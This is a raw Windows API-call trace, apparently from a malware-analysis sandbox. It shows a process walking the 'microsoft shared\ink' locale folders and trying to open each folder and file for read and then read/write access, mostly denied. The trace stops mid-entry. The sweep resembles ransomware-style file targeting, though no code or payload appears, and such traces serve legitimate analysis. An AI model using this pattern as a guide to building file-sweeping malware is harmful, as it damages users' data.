[0100.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.970] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c896f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0100.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0100.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.970] AreFileApisANSI () returned 1 [0100.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR", lpUsedDefaultChar=0x0) returned 57 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0100.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.970] AreFileApisANSI () returned 1 [0100.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 57 [0100.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.971] GetLastError () returned 0x5 [0100.971] GetLastError () returned 0x5 [0100.971] SetLastError (dwErrCode=0x5) [0100.971] GetLastError () returned 0x5 [0100.971] SetLastError (dwErrCode=0x5) [0100.971] GetLastError () returned 0x5 [0100.971] SetLastError (dwErrCode=0x5) [0100.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.971] AreFileApisANSI () returned 1 [0100.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0100.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR") returned 57 [0100.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.971] GetLastError () returned 0x5 [0100.971] GetLastError () returned 0x5 [0100.971] SetLastError (dwErrCode=0x5) [0100.971] GetLastError () returned 0x5 [0100.971] SetLastError (dwErrCode=0x5) [0100.971] GetLastError () returned 0x5 [0100.971] SetLastError (dwErrCode=0x5) [0100.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0100.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0100.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.972] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8ed8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0100.972] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0100.972] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c896f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.972] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0100.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0100.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.973] AreFileApisANSI () returned 1 [0100.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0100.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.973] AreFileApisANSI () returned 1 [0100.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85300 [0100.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui") returned 73 [0100.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.974] GetFileType (hFile=0x27c) returned 0x1 [0100.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0100.974] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.974] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.974] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.974] CloseHandle (hObject=0x27c) returned 1 [0100.975] AreFileApisANSI () returned 1 [0100.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0100.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd98, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui") returned 73 [0100.975] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.975] GetLastError () returned 0x5 [0100.975] GetLastError () returned 0x5 [0100.975] SetLastError (dwErrCode=0x5) [0100.975] GetLastError () returned 0x5 [0100.975] SetLastError (dwErrCode=0x5) [0100.975] GetLastError () returned 0x5 [0100.975] SetLastError (dwErrCode=0x5) [0100.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0100.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0100.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.975] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c658, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.975] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0100.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0100.976] AreFileApisANSI () returned 1 [0100.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA", lpUsedDefaultChar=0x0) returned 57 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0100.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.977] AreFileApisANSI () returned 1 [0100.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0100.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 57 [0100.977] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\uk-ua"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.977] GetLastError () returned 0x5 [0100.977] GetLastError () returned 0x5 [0100.977] SetLastError (dwErrCode=0x5) [0100.977] GetLastError () returned 0x5 [0100.977] SetLastError (dwErrCode=0x5) [0100.977] GetLastError () returned 0x5 [0100.977] SetLastError (dwErrCode=0x5) [0100.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0100.977] AreFileApisANSI () returned 1 [0100.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.977] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\uk-UA") returned 57 [0100.977] CreateFileW (lpFileName="C:\\Program Files\\Common 